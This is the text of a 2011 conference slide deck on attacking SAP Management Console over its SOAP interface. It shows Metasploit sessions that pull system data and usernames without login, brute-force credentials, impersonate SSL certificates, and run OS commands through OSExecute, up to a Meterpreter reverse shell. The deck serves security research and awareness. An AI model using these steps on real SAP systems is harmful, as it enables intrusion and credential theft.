SecZone 2011: Scrubbing SAP clean with SOAP

SAP (in)security
Scrubbing SAP clean with SOAP
Chris John Riley

“THE WISEST MAN, IS HE
WHO KNOWS, THAT HE
KNOWS NOTHING”
SOCRATES: APOLOGY, 21D

SPANISH IS NOT
MY
STRONGPOINT

1) What's what
2) Information is king
3) Getting in the middle
4) Putting it all together
5) Stopping Bob!

“…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”

Other people describe them as…

“…the world's leading repository of
business critical information, SAP (which
stands for ”Security Ain't [our] Problem")
delivers products and services that help
attackers gain access to critical
enterprise data.”

Some rights reserved by TrevinC

Some rights reserved by Telstar Logistics

So Many Reasons
 Vulnerabilties are a part of it!
 Every system has it‘s vulnerabilities

 SAP installations often fall to business
 Not an operations problem
 Financial data should be handled by the business
 Security team never gets close to it!

“YOU CAN'T TEST THAT, IT'S
BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER

You’re getting SOAP all over my SAP!

THIS TALK
SAP Security

Netweaver .

SOAP

SOAP Request Example (1)
POST /InStock HTTP/1.1
....
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2001/12/soap-
envelope"
soap:encodingStyle="http://www.w3.org/2001/12/so
ap-encoding">
<soap:Body>....</soap:Body>
</soap:Envelope>

SOAP Request Example (2)

...
<soap:Body xmlns:m="http://test.org/stock">
<m:GetStockPrice>
<m:StockName>SAP</m:StockName>
</m:GetStockPrice>
</soap:Body>
...

SOAP Response Example

...
<m:GetStockPriceResponse>
<m:Price>34.5</m:Price>
</m:GetStockPriceResponse>
</soap:Body>
...

A LITTLE BIT
ABOUT SAP
MANAGEMENT
CONSOLE

SAP MC Communications

 Default port 5<instance>13/14
 50013 HTTP
 50014 HTTPS
 Can use SSL
 If it‘s configured
 More on this later!

SAP MC Communications

 Uses Basic auth for some functions
 Yes... It‘s 2011
 Yes... Companies still use Basic Auth
 Most functions don‘t even use that!
 Yes... Unauthenticated!

“If there's one thing SAP MC loves,
it's giving away information“

Quote by:
Me, just now!

Information is king

 Version information
 Sure, HTTP headers give that!
 Nothing new here... mostly
 Down to the patch-level
 Can you say “targeted attack“

Version Information
msf auxiliary(sap_mgmt_con_version) > show options

Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host

Version Information
msf auxiliary(sap_mgmt_con_version) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Information is king

 Startup profile
 Instance name
 SAP System Name
 SAP SID
 SAP DB Schema
 Paths
 ....

Startup Profile
msf auxiliary(sap_mgmt_con_startprofile) > run

[+] [SAP] Startup Profile Extracted: WINXPSAP-
TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP
-TST
[*] SAPSYSTEMNAME = NSP
[*] SAPGLOBALHOST = WINXPSAP-TST
[*] SAPSYSTEM = 00
[*] INSTANCE_NAME = DVEBMGS00
[*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile
[*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST
[*] dbs/ada/schema = SAPNSP

Information is king

 Server / Instance Environment
 Computername
 OS Service userame
 Database Names
 Database Type (Oracle, MaxDB, ...)
 Full Server Environment Variable list!
 Information overload
 OMG why!

Environment
msf auxiliary(sap_mgmt_con_getenv) > run

[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:WINDOWSsystem32cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT
[*] USERNAME=SAPServiceNSP
[*] PSModulePath=C:windowssystem32PowerShell...
[*] SAPEXE=E:usrsapNSPSYSexeucNTI386
[*] TMP=E:usrsapNSPtmp

Environment
msf auxiliary(sap_mgmt_con_getenv) > run

[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:WINDOWSsystem32cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT Operating System User
[*] USERNAME=SAPServiceNSP
[*] PSModulePath=C:windowssystem32PowerShell...
[*] SAPEXE=E:usrsapNSPSYSexeucNTI386
[*] TMP=E:usrsapNSPtmp

Information is king

 SAP Log/Tracefiles
 SAP Startup Logs
 Error / Debug Logs
 Developer Traces
 Security Logs
 SAP ABAPSysLog
 SAP Startup Times
 PIDs
 Services + Status Info

Log/Trace Files
msf auxiliary(sap_mgmt_con_listlogfiles) > run

Filename Size Timestamp
-------- ---- ---------
available.log 2268 2011 10 16 12:52:33
dev_cp 4397 2011 04 19 10:30:48
dev_disp 4612 2011 10 14 15:06:14
dev_icm 6594 2011 10 14 15:07:38
sapstart.log 629 2011 10 14 15:06:04
sapstartsrv.log 754 2011 10 16 10:04:36
stderr1 903 2011 10 14 15:06:04

Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:usrsapNSPDVEBMGS00workdev_w0<name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
…

ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)
</Text><Severity>SAPControl-GREEN</Severity>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4;
Unicode Version 4.1
</Text><Severity>SAPControl-GREEN</Severity></item>
…

Information is king

 Extracting data from logfiles
 Logfiles include usernames
 Scrape for SAP usernames
 Instant brute-force user list!
 Just an example of the data availble

Extract SAP Users
[+] [SAP] Users Extracted: 10 entries extracted
[+] [SAP] Extracted User: SAPSYS
[+] [SAP] Extracted User: TEST1
[+] [SAP] Extracted User: TESTDEV
[+] [SAP] Extracted User: ADMIN1
[+] [SAP] Extracted User: SADM
…

Extract SAP Users
[+] [SAP] Users Extracted: 10 entries extracted
[+] [SAP] Extracted User: SAPSYS

SAP USERS
[+] [SAP] Extracted User: TESTDEV
[+] [SAP] Extracted User: ADMIN1
[+] [SAP] Extracted User: SADM
…

Information is king

 Process Parameters
 Output of the entire SAP configuration
 Password Policies
 Setup your Brute-force just right ;)
 Hash Types
 Still supporting those old 8 char hashes?
 Security Audit Log Enabled ?
 rsau/enabled (default: 0)
 Is anybody watching?

Process Parameters
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0

Process Parameters
<SAPControl:GetProcessParameterResponse><parameter>
<item><name>DIR_AUDIT</name>
<group>System</group>
<description>Directory for security audit files</description>
<unit/><value>E:usrsapNSPDVEBMGS00log</value></item>
<item><name>login/fails_to_user_lock</name>
<group>Login</group>
<description>Number of invalid login attempts until user
lock</description>
<unit/><value> 5 </value></item>
…

Information is king

 Useful Process Parameters
 rsau/enabled
 login/password_downward_compatibility
 login/failed_user_auto_unlock
 login/fails_to_user_lock
 login/min_password_lng
 login/password_charset
 ....

*Checkout consolut.com for a great list

“I put a whitebox configuration audit
in your blackbox penetration test, so
you can whitebox SAP while you
blackbox it!“
Quote by:
Me, just now!

ALL THE FUNCTIONS
SO FAR ARE
UNAUTHENTICATED

2,700
Number of SAP servers
2,675
listening on public addresses

2,650

2,625

2,600

2,575

2,550

2,525

2,500

Router Gateway SAP MC SAP MC (SSL)

Some rights reserved by Crystl

Getting in the middle

 Force Authentication
 Basic Auth == Clear Text
 Credentials FTW!
 Alter Requests
 Do what YOU want
 Alter Responses

SSL PROTECTION
4 MAJOR OPTIONS


Self Signed


Device Default
 Often the same on EVERY device
 Not an option for SAP


Enterprise CA
 You sign your own certs centrally
 PKI Infrastructure


Externally signed
 Diginotar to the rescue!
 SAP also offer signing services


 Impersonate SSL
 There‘s a module for that!
 Metasploit (ssl_impersonate.rb)
 Creates a fake cert
 As close to the original as possible
 Useful SE options
 Expired yesterday
 Add CN names for ease of use


As near as darn a clone of the original
Fingerprints + Serial Number differ


All CN data is 100% cloned…
Average users don’t care!

OSExecute

 SAP MC generously offers OSExecute function
 Valid username/password req.
 That‘s handy!

MITM

 Using the force-auth method
 Check under the keyboard
 Post-it notes!
 Rubber hose method

Brute-Force

 Metasploit module
 Set SAP SID for SAP specific checks

 Watchout for lockouts!
 Denial of Service?

Brute Force
msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msf auxiliary(sap_mgmt_con_brute_login) > run

[*] SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP’
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…

OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[+] [SAP] Command run as PID: 1240
Command output
--------------
WINXPSAP-TST

THANKS, BUT
WE WANT FULL
ACCESS!

Getting Meterpreter

 Using tricks built into Metasploit
 Encode Payload
 Split it up into chucks
 Shove it in
 Start it up!
 Profit

OSExecute Meterpreter
msf exploit(sap_mgmt_con_osexec_exploit) > exploit

[*] Started reverse handler on 172.16.15.134:4444
[*] Command Stager - 7.42% done (7499/101079 bytes)
...

[*] Command Stager - 100.00% done (101079/101079 bytes)
[*] Meterpreter session 1 opened (172.16.15.134:4444 ->
172.16.15.128:1144) at 2011-10-16 14:41:59 +0200
meterpreter > getuid
Server username: WINXPSAP-TSTSAPServiceNSP

WHY IS YOUR SAP
MC ACCESSIBLE
TO THE WORLD!

Fixing the issues

 SAP Fix
 Note 1439348
 Issue also discovered by Onapsis
 No idea what it says!
 SAP restrict ALL fix info to customers only

SAP SECURITY
ISN’T ALL ABOUT
ROLED

Questions ?
http://c22.cc
contact@c22.cc

Big Thanks

 The REAL SAP Security Researchers
 Onapsis, DSecRG, Raul Siles, CYBSEC
 SAP PSRT (for emailing me a lot)
 DirtySec (You know who you are!)
 MacLemon (for the PPT-fu)
 ED
 For inviting us, even though we cause problems!
 All the people who helped make this happen

Thanks for coming
contact@c22.cc

Sorry for sucking so bad!

contact@c22.cc

SecZone 2011: Scrubbing SAP clean with SOAP

More Related Content

What's hot (20)

Similar to SecZone 2011: Scrubbing SAP clean with SOAP (20)

Recently uploaded (20)

SecZone 2011: Scrubbing SAP clean with SOAP

Editor's Notes